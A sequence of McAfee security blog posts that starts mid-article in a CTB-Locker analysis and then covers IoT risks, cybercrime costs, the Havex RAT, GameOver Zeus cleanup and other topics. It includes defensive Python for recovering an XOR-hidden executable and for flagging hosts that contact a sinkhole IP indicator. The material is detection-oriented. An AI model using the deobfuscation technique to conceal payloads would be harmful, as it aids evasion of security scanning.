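The gateway check described above (no known magic number at offset zero) and the analyst's follow-up (recovering an executable that was hidden with XOR) can be shown together in one small script. The Python below is an added example, not the McAfee analysis code and not a parser for the actual pack.tar.gz: it assumes the hidden executable was XOR-coded with a single key byte and uses the DOS stub text that every PE carries as known plaintext to recover that key, then confirms the hit by checking that the "MZ" header's e_lfanew field points at a "PE\0\0" signature under the same key. All function names and the sample blob are constructed here.

```python
"""Added detection example (not the McAfee analysis code): find a Windows
executable hidden in a blob with no recognisable file header, on the assumption
that the payload was XOR-coded with a single key byte. Two pieces of known
plaintext give the key away: the DOS stub message every PE carries and the
"MZ" / "PE\0\0" signatures that must line up through e_lfanew."""
import struct
from typing import List, Optional, Tuple

DOS_STUB = b"This program cannot be run in DOS mode"
MAGIC_NUMBERS = {               # a few well-known file headers for the first check
    b"MZ": "PE/DOS executable",
    b"\x7fELF": "ELF executable",
    b"PK\x03\x04": "ZIP archive",
    b"\x1f\x8b": "gzip",
    b"%PDF": "PDF",
}


def known_magic(blob: bytes) -> Optional[str]:
    """What a gateway scanner checks first: does the file start with a known magic number?"""
    for magic, name in MAGIC_NUMBERS.items():
        if blob.startswith(magic):
            return name
    return None


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def find_xored_dos_stub(blob: bytes) -> List[Tuple[int, int]]:
    """(offset, key) wherever the DOS stub text appears XORed with one key byte.
    Every byte of the window must agree on the same key, which rules out chance hits."""
    hits = []
    n = len(DOS_STUB)
    for off in range(len(blob) - n + 1):
        key = blob[off] ^ DOS_STUB[0]
        if all(blob[off + i] ^ DOS_STUB[i] == key for i in range(n)):
            hits.append((off, key))
    return hits


def pe_signature_ok(blob: bytes, mz: int, key: int) -> bool:
    """Confirm a candidate MZ header: e_lfanew (at +0x3C) must point at 'PE\\0\\0'."""
    if mz + 0x40 > len(blob):
        return False
    e_lfanew = struct.unpack("<I", xor_bytes(blob[mz + 0x3C:mz + 0x40], key))[0]
    sig = mz + e_lfanew
    return sig + 4 <= len(blob) and xor_bytes(blob[sig:sig + 4], key) == b"PE\x00\x00"


def find_xored_pe(blob: bytes) -> List[Tuple[int, int]]:
    """(mz_offset, key) for each XOR-obfuscated PE whose stub and signatures line up."""
    results = []
    for stub_off, key in find_xored_dos_stub(blob):
        # The stub sits a few dozen bytes after the MZ header, so walk backwards.
        for mz in range(stub_off - 2, max(stub_off - 0x200, 0) - 1, -1):
            if (blob[mz] ^ key == 0x4D and blob[mz + 1] ^ key == 0x5A
                    and pe_signature_ok(blob, mz, key)):
                results.append((mz, key))
                break
    return results


def recover_pe(blob: bytes, mz: int, key: int) -> bytes:
    """Strip the XOR layer from the embedded executable for further analysis."""
    return xor_bytes(blob[mz:], key)


def build_fake_pe() -> bytes:
    """A minimal CONSTRUCTED PE-shaped header (not a real program) for the demo."""
    pe = bytearray(b"MZ") + b"\x90" * (0x3C - 2)
    pe += struct.pack("<I", 0x80)                 # e_lfanew -> PE signature at 0x80
    pe += b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"   # stub code
    pe += DOS_STUB + b".\r\r\n$"
    pe += b"\x00" * (0x80 - len(pe))
    pe += b"PE\x00\x00" + b"\x4c\x01" + b"\x00" * 32
    return bytes(pe)


# Constructed "pack.tar.gz"-style blob: junk prefix, then the fake PE XORed with 0x5A.
FAKE_PE = build_fake_pe()
XOR_KEY = 0x5A
JUNK_PREFIX = b"\xc3\x17\x42\x9a\x00\x00\x01\xff"
SAMPLE_BLOB = JUNK_PREFIX + xor_bytes(FAKE_PE, XOR_KEY)

if __name__ == "__main__":
    print("magic:", known_magic(SAMPLE_BLOB))      # None: nothing a gateway recognises
    print("hits:", find_xored_pe(SAMPLE_BLOB))     # [(8, 90)]
```

Two caveats follow from the text itself. First, pack.tar.gz used different XOR keys for different parts of the file, so a single-key recovery like `recover_pe` only yields the region the stub anchors; each further region needs its own known-plaintext anchor (section names, import strings) to recover its key. Second, the absence of a magic number is exactly why a gateway should not stop at `known_magic`: a blob that matches no known type but is the size of an executable is a reason to look harder, not a reason to pass it.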

As a quick Yara detection rule, the following can be used:

[Image: code 3]

Bitcoin trail

While tracing the Bitcoin trail and possible transactions, no value on the account was found and no transactions were made to other accounts.

Removal

All users: Use current engine and DAT files for detection and removal.

Modifications made to the system registry and/or INI files to hook system start-up will be successfully removed if cleaning with the recommended engine and DAT combination (or later versions).

A special thanks to Sanchit Karve for his assistance in the analysis.

The post The Rise of Backdoor-FCKQ (CTB-Locker) appeared first on McAfee Blogs.

The role of private sector in combatting cybercrime
https://securingtomorrow.mcafee.com/business/role-private-sector-combatting-cybercrime/
Fri, 21 Nov 2014 11:48:21 +0000

This week we announced the signing of a Memorandum of Understanding (MoU) with the European Cybercrime Centre (EC3) that combines our skills in the war against cybercrime. This agreement demonstrates our commitment to addressing the growing menace that each and every one of us faces in the digital world today.

As our dependence on the internet continues to grow, so too does our vulnerability to the increasingly frequent and sophisticated attacks that cybercriminals wage on businesses and consumers. We must meet these aggressive attacks with not only innovative technology and expertise, but also deeper industry and government collaboration to ensure our defence is strongest.

The harsh reality about the global nature of cybercrime is that no entity can combat it alone, as Troels Oerting, the Head of EC3, commented: “This task cannot be done by law enforcement alone, and requires a much broader approach.”

This agreement will see McAfee and EC3 increase the defence against our adversaries through engagement in joint operations to address identified cybercriminal campaigns, the sharing of best practices, and, in a step moving beyond just tactical engagement, the sharing of non-operational technical data as it relates to cybercrime.

At McAfee we strongly believe in the importance of a public-private partnership, and with the McAfee Labs team made up of more than 400 researchers across 30 countries analyzing data from millions of sensors, we work hard to deliver expert insight that enables law enforcement to stop cyber criminals in their tracks.

Our mission at McAfee is to give everyone the confidence to live and work safely and securely in the digital world. I believe this partnership further demonstrates our commitment and, importantly, our ability, to deliver on this mission.

[Image: Europol signing2]

Troels Oerting and Raj Samani

Connect with me on Twitter: @raj_samani

The post The role of private sector in combatting cybercrime appeared first on McAfee Blogs.

3 key security challenges for the Internet of Things
https://securingtomorrow.mcafee.com/business/3-key-security-challenges-internet-things/
Wed, 29 Oct 2014 20:18:51 +0000

What challenges pose the biggest threat to the Internet of Things?

The Internet of Things (IoT) is already starting to give rise to real-world applications, from connected homes and cars to health monitoring and smart utility meters.

Analyst Gartner predicts there will be 26 billion IoT devices – excluding PCs, tablets and smart phones – by 2020. That’s a 30-fold increase from 900 million in 2009.

I was at an event in Munich just last month where a presenter spoke about how it took the decade up to 2005 for the deployment of the first billion internet-connected sensors. The latest billion sensors were implemented during 2013 alone and we are well on our way to the first trillion. The pace of this growth is relentless.

But there has been one thing missing from many of the IoT discussions to date – trust. The IoT represents an entirely different level of scale and complexity when it comes to the application of the foundations for this trust, namely security and privacy.

Already we are seeing hacks – proof-of-concept and in the wild – on IoT applications, such as smart TVs and cash machines to malware infected high-risk pregnancy monitors at a Boston hospital in the US. And in its latest internet threat assessment report the European crime agency Europol warns that the IoT creates new types of risks and threats not only in consumer applications but also in critical infrastructure control systems.

It goes on to say: “We can expect to see (more) targeted attacks on existing and emerging infrastructures, including new forms of blackmailing and extortion schemes (e.g. ransomware for smart cars or smart homes), data theft, physical injury and possible death, and new types of botnets.”

Here are three key IoT security challenges I foresee:

1. A trillion points of vulnerability

Every single device and sensor in the IoT represents a potential risk. How confident can an organisation be that each of these devices has the controls in place to preserve the confidentiality of the data collected and the integrity of the data sent?

Researchers at the French technology institute Eurecom downloaded some 32,000 firmware images from potential IoT device manufacturers and discovered 38 vulnerabilities across 123 products, including poor encryption and backdoors that could allow unauthorised access. And one weak link could open up access to hundreds of thousands of devices on a network, with potentially serious consequences.

2. Trust and data integrity

Corporate systems will be bombarded by data from all manner of connected sensors in the IoT. But how sure can an organisation be that the data has not been compromised or interfered with?

Take the example of utility companies automatically collecting readings from customer smart meters. Researchers have already demonstrated that smart meters widely used in Spain, for example, can be hacked to under-report energy use. They were able to spoof messages being sent from the meter to the utility company and send false data. In recent years we have been able to go to a high street store and buy anti-virus protection on a disc or download it straight to our PC. But in the IoT that security capability doesn’t exist in many of the devices that will suddenly become connected.

Security must be built into the design of these devices and systems to create trust in both the hardware and integrity of the data.

3. Data collection, protection and privacy

The vision for the IoT is to make our everyday lives easier and boost the efficiency and productivity of businesses and employees. The data collected will help us make smarter decisions. But this will also have an impact on privacy expectations. If data collected by connected devices is compromised it will undermine trust in the IoT. We are already seeing consumers place higher expectations on businesses and governments to safeguard their personal information.

And beyond that, what about the security that protects the critical national infrastructure (CNI), such as oil fields and air traffic control? With everything connected, the IoT smashes the separation between the CNI and the consumer world. Everyday household items could potentially be exploited by cybercriminals to gain access to the CNI.

Businesses need to start now to identify the risk level for their current exposure to the IoT and where it is going in the future, and also to think about the privacy and security implications associated with the volume and type of data the IoT will generate.

It truly is a brave new world that promises many exciting opportunities. Trust is the foundation of the IoT and that needs to be underpinned by security and privacy. And it’s a conversation we all need to start having now if we are to reap the benefits of the connected world.

The post 3 key security challenges for the Internet of Things appeared first on McAfee Blogs.

4 hidden economic costs of cybercrime https://securingtomorrow.mcafee.com/business/4-hidden-economic-costs-cybercrime/ Wed, 29 Oct 2014 19:59:45 +0000

The post 4 hidden economic costs of cybercrime appeared first on McAfee Blogs.


There are many obvious and headline-grabbing costs of cybercrime. In the past few months alone there have been numerous high-profile data security breaches where hackers have obtained tens of millions of customer details, ranging from credit card numbers to medical records.

While the direct cost of insuring against such losses can be quantified, there are also many hidden – and arguably more serious – costs of cybercrime that hurt individual companies, countries and the global economy as a whole.

McAfee, in conjunction with the Center for Strategic and International Studies (CSIS), compiled a report this summer on the global economic impact and cost of cybercrime. Although the model to estimate cost is constrained by the availability of data regarding losses being reported, it does put a figure on the annual cost to the global economy from cybercrime at somewhere between a conservative lower figure of $375 billion and possibly as much as $575 billion.

The average annual loss due to cybercrime among all countries was 0.5 per cent of GDP, although countries in Europe and North America lost more – with Germany and the Netherlands at 1.6 per cent of GDP. Much of this is as a result of indirect costs that aren’t immediately obvious. Here are four hidden economic costs of cybercrime:

1. Intellectual property (IP) theft and cannibalism

The value of research and development (R&D) is the head start it gives companies in the market, and the theft of IP damages innovation. It lessens the returns from R&D for companies and investors, potentially reducing the overall rate of innovation. The value of stolen IP is, however, the most difficult component of the cost of cybercrime to calculate.

2. Opportunity cost

IP theft can lead to reduced investment in R&D, while cybercrime incidents more generally can lead to risk averse behaviour by businesses and consumers that limits internet use. Take the healthcare sector as an example. The use of IT in healthcare has been slowed by the fear, valid or not, that health information could be stolen, patient data could be manipulated and devices interfered with by hackers. The same may prove true for self-driving cars and other new technologies such as smart meters. In the US privacy and security fears over smart meters even led to one Texas citizen pulling a gun on a public utility contractor sent to install one of the meters. The woman said her concerns were not only about the monitoring and data being collected but the fact that hackers could potentially intercept and access that information.

3. Recovery

This can often be more than the cost of the crime itself. One estimate by the analyst Gartner puts the losses at Target at up to $420 million, including reimbursement, the cost of reissuing cards, legal fees and credit monitoring for millions of customers. The short-term effect on company stock prices can also be significant after a breach, although it usually recovers within a quarter or two. That might change in the future, however, if companies are required to report major hacking incidents and describe what has actually been lost (although it's worth noting that many US states already require companies to report breaches).

4. Employment

Cybercrime has serious implications for employment in developed countries. Even small changes in GDP can affect employment and, based on the figures in our report, Europe could lose as many as 150,000 jobs due to the hit on GDP from cybercrime. Of course that’s not necessarily a net job loss figure – many of those would find other work. But the general impact is to shift employment away from high-value jobs to low paying jobs or .

Cybercrime damages trade, competitiveness, innovation and global economic growth. Companies and countries are underestimating their risk and exposure to cybercrime and those that fail to adequately protect their networks will be at an increasing competitive disadvantage.

Make no mistake, cybercrime continues to be a growth industry but the situation is not irreparable. Better technology, stronger defences, best practices for cybersecurity, international agreement on law enforcement and companies doing a better job of assessing risk can all help tackle cybercrime.

Operation Dragonfly Imperils Industrial Protocol https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-dragonfly-imperils-industrial-protocol/ Wed, 02 Jul 2014 19:52:54 +0000

The post Operation Dragonfly Imperils Industrial Protocol appeared first on McAfee Blogs.

Recent headlines (here and here) may have struck fear into those living near major energy installations due to references about the Stuxnet malware. In 2009, this particular strain of malware caused significant damage to the Natanz nuclear facility, reportedly destroying a fifth of Iran's nuclear centrifuges. Recent reports about Operation Dragonfly, however, appear to be focused on espionage (at least for now), and the scope of the attack appears to be considerably broader than that of Stuxnet.

The various elements associated with Operation Dragonfly draw comparison with Operation Shady RAT, in which at least the first phase targeted specific individuals via email. Beyond the specifics of the operation, however, Operation Dragonfly raises very significant concerns regarding the safety of the systems that comprise our critical infrastructure, and in particular regarding the ever-growing supply chain.

This threat was covered in detail in the recently published book “Applied Cyber Security and the Smart Grid: Implementing Security Controls into the Modern Power Infrastructure,” coauthored by Raj Samani and Eric Knapp, and edited by Joel Langill. The espionage from Dragonfly could lead to another attack. In the book the authors write: “the SCADA and automation systems within the grid also provide a blueprint to the inner workings of the grid operations. This is valuable intellectual property that could be used for malicious purposes ranging from the influence of energy trading to the development of a targeted, weaponized attack against the grid infrastructure or against the grid operator.”

One of the primary tools leveraged in Operation Dragonfly is Havex. The Havex remote access tool (RAT) can be traced back to (at least) mid-2012 and is not necessarily exclusive to this attack or campaign or actor. Havex is closely related to the SYSMain RAT, and may even be a derivative. We have also observed them used in conjunction. The Trojan is distributed via spear phishing, watering-hole attacks, and by inclusion in exploit kits (such as LightsOut). This family takes advantage of OLE for Process Control (OPC) servers.

The method by which the Havex RAT targeted industrial control systems owners was clever. In addition to spear phishing, the control system vendors’ websites were used as watering holes, ensuring that the delivery of the RAT was highly focused. The next stage, the enumeration of OPC servers, is also clever and very concerning. The malware focuses enumeration on OPC Classic, which lacks the security features of newer OPC variants, and indicates that the attacker is knowledgeable about industrial security—a niche that, to some, benefited from “security through obscurity.” The biggest concern, therefore, is that once again we’re seeing malware targeting an industrial protocol.

In “Applied Cyber Security” the authors wrote, “Industrial protocols in and of themselves represent a challenge to cyber security. … Because most of these protocols provide command and control functionality to the system, an interruption could result in the failure of substation automation, dynamic load management, fault isolation, and even protection systems.”

By specifically targeting OPC Classic, the attacker is likely to discover more vulnerable legacy systems. OPC is extremely common, and can interface with a variety of key systems within almost every industrial environment, from almost every sector. From a network design perspective, OPC uses a wide range of ports; unless OPC is tunneled, firewalls allowing OPC are as open as Swiss cheese. Although there's still a lot to learn about Havex, this event should inspire asset owners to harden OPC servers, and to assess their networks with this type of attack in mind. Inspection and enforcement of OPC using application-layer firewalls is a good start. Without an industry-wide effort to stem the inherent vulnerabilities in OPC, Havex could prove itself to be another devastating “industrial” RAT—alongside DistTrack (a.k.a. Shamoon), Duqu, Stuxnet, and Gauss—capable of remote command of control systems. That is something that no one wants to see happen.

For more information, please refer to “Applied Cyber Security and the Smart Grid.”

GameOver Zeus/Cryptolocker: Am I Still Infected? https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/gameover-zeuscryptolocker-still-infected/ Fri, 27 Jun 2014 23:32:02 +0000

The post GameOver Zeus/Cryptolocker: Am I Still Infected? appeared first on McAfee Blogs.

It has been two weeks since the announcement by multiple global law enforcement agencies regarding the takedown of the communications infrastructure for the Trojans GameOver Zeus and Cryptolocker. Judging by the number of downloads for the McAfee Stinger utility, thousands of systems worldwide no longer provide money to Evgeniy Mikhailovich Bogachev and his associates.

However, managing the cleanup across multiple systems can be an onerous task. For those responsible for managing many systems, running the McAfee Stinger in a systematic fashion across all devices is simply not an option. Infected systems that connect to one of the sinkholes will also make a connection to the following IP address: 72.52.116.52:4643.

McAfee recommends that system managers not block or filter this address because it acts as a useful indicator for infected devices, and connecting to this address does not introduce any risk.

With this information, it is possible to configure your security products to alert you should any of your systems attempt to connect to this IP address and port number. McAfee Enterprise Security Manager (see Figure 1) provides real-time visibility into all activity across systems, networks, databases, and applications, giving real-time situational awareness; a rule on this indicator allows organizations to respond intelligently and efficiently in mitigating GameOver Zeus and Cryptolocker infections.

Figure 1: McAfee Enterprise Security Manager.

In order to detect whether any systems are attempting to connect to this lighthouse IP address, an alert can be created that will generate an alarm when the rule is activated (see Figure 2):

Figure 2: A McAfee Enterprise Security Manager alarm.

When activated, the alarm will inform the system administrator which system is likely infected. This provides an opportunity to focus your removal efforts using an efficient means to address GameOver Zeus and Cryptolocker infections.
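The same indicator-based check, written as an added example rather than anything from the post or from McAfee Enterprise Security Manager: it parses constructed firewall log lines in a hypothetical format, matches only the exact IP:port pair quoted above (72.52.116.52:4643), and reports which internal hosts attempted the connection, counting denied attempts as well because the attempt itself is the signal.

```python
"""Added example (not from the McAfee post): flag hosts whose outbound
connections match the GameOver Zeus sinkhole indicator 72.52.116.52:4643,
using constructed firewall log lines in a hypothetical format."""
import re
from collections import defaultdict

# Indicator quoted in the post: infected systems connect to this IP:port.
SINKHOLE_IP = "72.52.116.52"
SINKHOLE_PORT = 4643

# Hypothetical log format (not any vendor's):
# <ISO timestamp> action=<allow|deny> src=<ip>:<port> dst=<ip>:<port> proto=<tcp|udp>
LOG_RE = re.compile(
    r"^(?P<ts>\S+) action=(?P<action>\w+) "
    r"src=(?P<src_ip>[\d.]+):(?P<src_port>\d+) "
    r"dst=(?P<dst_ip>[\d.]+):(?P<dst_port>\d+) proto=(?P<proto>\w+)$"
)

# Constructed sample log: two hosts hit the exact indicator (one of them
# twice, one denied), one host talks to the IP on a different port, and
# one line is malformed.
SAMPLE_LOG = """\
2014-06-27T10:01:02Z action=allow src=10.0.5.23:51234 dst=72.52.116.52:4643 proto=tcp
2014-06-27T10:01:05Z action=allow src=10.0.5.23:51235 dst=203.0.113.5:443 proto=tcp
2014-06-27T10:02:11Z action=allow src=10.0.7.8:40001 dst=72.52.116.52:80 proto=tcp
2014-06-27T10:03:40Z action=deny src=10.0.9.14:60210 dst=72.52.116.52:4643 proto=tcp
2014-06-27T10:04:00Z action=allow src=10.0.5.23:51240 dst=72.52.116.52:4643 proto=tcp
this line is malformed and must be skipped
"""


def parse_line(line):
    """Return a dict of fields for a well-formed line, else None."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def matches_indicator(rec):
    """True only when BOTH the IP and the port match. The post ties the
    indicator to the pair, so 72.52.116.52 on another port is not counted."""
    return rec["dst_ip"] == SINKHOLE_IP and int(rec["dst_port"]) == SINKHOLE_PORT


def find_suspect_hosts(log_text):
    """Map each internal source IP that hit the indicator to its hit count.
    Allowed and denied attempts both count: the attempt is the signal, which
    is why the post advises alerting on the address rather than blocking it."""
    hits = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # skip malformed lines rather than crash the sweep
        if matches_indicator(rec):
            hits[rec["src_ip"]] += 1
    return dict(hits)


if __name__ == "__main__":
    for host, n in sorted(find_suspect_hosts(SAMPLE_LOG).items()):
        print(f"likely GameOver Zeus infection: {host} ({n} sinkhole connection(s))")
```

On the constructed sample this reports 10.0.5.23 (two attempts) and 10.0.9.14 (one denied attempt) and ignores 10.0.7.8, whose connection was to the same IP but on port 80.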

Thanks to Martin DeJongh, Enterprise Technology Architect, for his assistance with this post and guidance.

Cloud Computing for Critical Infrastructure https://securingtomorrow.mcafee.com/business/cloud-computing-for-critical-infrastructure-2/ Mon, 04 Feb 2013 17:20:03 +0000

The post Cloud Computing for Critical Infrastructure appeared first on McAfee Blogs.

Cloud computing continues to be a hot topic. But so what if people are talking about it, who is actually adopting it? One of the questions I have been asking myself is, ‘Will cloud be adopted for critical infrastructure? And what is the security perspective on this?’

Naturally a blog post to answer that question will never really do the topic any justice. But it is a crucial issue. I wrote about critical cloud computing a year ago on my blog, and over the past years I have worked on these issues, for example with the European Network and Information Security Agency (ENISA), which has published the white paper Critical Cloud Computing: A CIIP Perspective on cloud computing services.

The ENISA paper focusses on large cyber disruptions and large cyber attacks, as in the EU's Critical Information Infrastructure Protection (CIIP) plan, and looks at the relevant underlying threats such as natural disasters, power network outages, software bugs, exhaustion due to overload, cyber attacks, etc. It underlines the strengths of cloud computing when it comes to dealing with natural disasters, regional power cuts and DDoS attacks. At the same time it highlights that the impact of cyber attacks could be very large, because of the concentration of resources. Every day people discover software exploits in widely used software (this week UPnP, last month Ruby on Rails, and so on). What would be the impact if there was a software exploit for a cloud platform used widely across the globe?

As an expert on the ENISA Cloud Security and Resilience Working Group, I see this white paper as the starting point for discussions about what are the big cloud computing risks from a CIIP perspective. Revisiting the risk assessments we worked on in the past is important, mainly because the use of cloud computing is now so different, and because cloud computing is being adopted in critical sectors like finance, energy, transport and even governmental services.

A discussion about the CIIP perspective on cloud computing becomes all the more relevant in the light of the EU’s Cyber Security strategy, which will focus on critical sectors and preventing large-scale cyber attacks and disruptions. The strategy will be revealed by the European Commission in February and it will be interesting to see what role cloud computing will play in the strategy.

The report is available on the ENISA website at: https://resilience.enisa.europa.eu/cloud-security-and-resilience/cloud-computing-benefits-risks-and-recommendations-for-information-security/view

There is no doubt that internet connections and cloud computing are becoming the backbone of our society. The adoption within critical infrastructure sectors means that resilience and security becomes even more imperative for all of us.

[Note: This article was also published on the Cloud Security Alliance website]

Books Fight Back https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/books-fight-back/ Mon, 07 Feb 2011 16:35:07 +0000

The post Books Fight Back appeared first on McAfee Blogs.

You know, I always thought that at some point printed books would go the same way as vinyl. Despite sporadic revivals by the music industry and its use by particular groups such as the electronic and “mixmasters,” the majority of households have already replaced turntables with the latest technologies.

Equally, the latest published shopping trends suggest a transition from printed to electronic books, so I wasn't surprised to learn that Amazon has just announced that Kindle book sales outstrip paperbacks by 15% and hardbacks by 45%. (http://phx.corporate-ir.net/phoenix.zhtml?c=176060&p=irol-newsArticle&ID=1521090&highlight=)

The gradual shift, and more importantly the reliance on technology, means that failure to observe one of the three key tenets of information security, Availability, is having a dramatic impact on people's lives. Take for example the recent virus outbreak at Portsmouth libraries. It was reported that the impact of this outbreak resulted in public internet access being suspended for two weeks. (http://www.bbc.co.uk/news/uk-england-hampshire-12199223)

Although this is unlikely to be a problem for technology professionals like yourself, for many people this is the only lifeline they have to the online world.  A member of the Portsmouth Pensioners Association said that “A lot of our members do go to use the computers, because maybe they can’t afford to buy one or run one from home.  It’s a shame for them because it’s a good way to stay in contact with people.” 

Ensuring that systems are protected from unauthorized malware is a critical function for every organization, but when those systems provide a civic function to some of the most vulnerable groups in society, then it should be mandatory.  Access to the online world is now absolutely necessary in order to compensate for the closure of a number of post offices throughout the UK, and so the role of the local libraries is becoming more important than ever before.

Unless we want to keep the internet to only those lucky enough to own a computer, and only allow them access to the array of services both public and private sector has to offer, more must be done to ensure that outages are prevented.  After all, there are solutions available to protect systems from such outages.
